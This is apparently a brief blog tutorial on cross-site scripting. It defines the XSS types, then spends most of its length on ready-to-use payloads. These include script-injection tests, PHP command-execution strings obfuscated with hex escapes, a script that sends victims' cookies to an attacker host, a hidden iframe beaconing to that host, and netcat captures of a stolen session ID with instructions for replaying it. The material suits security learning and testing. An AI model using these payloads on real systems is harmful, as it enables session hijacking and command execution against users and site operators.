Basic XSS

2 minute read

Small post covering some basic information on XSS attacks and some sample payloads.

What is XSS?

Cross Site Scripting (XSS) is a form of injection attack found in web-applications. XSS vulnerabilities allow attackers to inject malicious code into websites, usually via un-sanitized input fields or parameters. The malicious code is processed in different ways, depending on the severity of the vulnerability.

Types of XSS:

  • Stored (persistent) XSS - Injects malicious code into a website’s forms, databases or other data. Injected code is stored on the server and return to other users when they browse to an infected page.

  • Reflected (non-persistent) XSS - Injects malicious code into HTTP requests/parameters that are then sent to the server, processed, and reflected back to the user.

  • DOM XSS - The malicious code is never sent to the server, client side only. If you’re unfimiliar with DOM, please click here.

For more information I’d recommend checking out OWASP XSS and the OWASP XSS Prevention CheatSheet.

Common XSS Tests

</script><script> alert("XSS"); </script><script> 
"><script >alert(document.cookie)</script >
"><script>alert(document.cookie)</script><! -- 
<script>var a = '</script><script>alert(document.cookie)</script>

I encountered a form input field where XSS and PHP could be used in conjunction:

</script><?php shell_exec("AttackerIP"); ?><script> // ping ourselves
<\script><?php (sy.(st).em)(whoami);?><script>      

<\script><?php system("\x69\x64")?><script>  // \x69\x64 == id

// \x3C\x3F\x70\x68\x70\x20\x73\x79\x73\x74\x65\x6D\x28\x22\x69\x64\x22\x29\x3B\x3F\x3E == <?php system("id");?>

Stealing Cookies

<script> new Image().src="http://AttackerIP/bogus.php?output="+document.cookie; </script>  

Start a netcat listener before injecting and you’ll receive the cookie:

# nc -nlvp 80
listening on [any] 80 ...
connect to [] from (UNKNOWN) [] 55540
GET /bogus.php?**output=PHPSESSID=tvd2ljlt16328t3ej2pqliv5e2**;%20LANG=EN_US;%20SINCE=1542307743;%20LIMIT=10;%20DOMAIN=admin HTTP/1.1
User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1
Accept: */*
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Accept-Language: en-US,*

Once we get an authorised user’s cookie, we can simply use a firefox extension like Cookie Quick Manager or Cookie Editor to introduce our stolen session ID into our browser and access the web app as that user.

Browser Redirection & IFRAME Injection

<iframe SRC="http://AttackerIP/report" height = "0" width ="0"></iframe>

// Once victim visits the affected output page, their browser connects to our attacking machine:

# nc -nlvp 80 
listening on [any] 80 ... 
connect to [AttackerIP] from (UNKNOWN) [Victim] 49275 
GET /report HTTP/1.1 
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */* 
Accept-Language: en-US 
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729) 
Accept-Encoding: gzip, deflate 
Host: AttackerIP
Connection: Keep-Alive

//  Browser redirection may be used to redirect a victim browser to a client side attack or to an information gathering script.

XSS Payloads and the XSS section of PayloadsAllTheThings are great resources for all things XSS.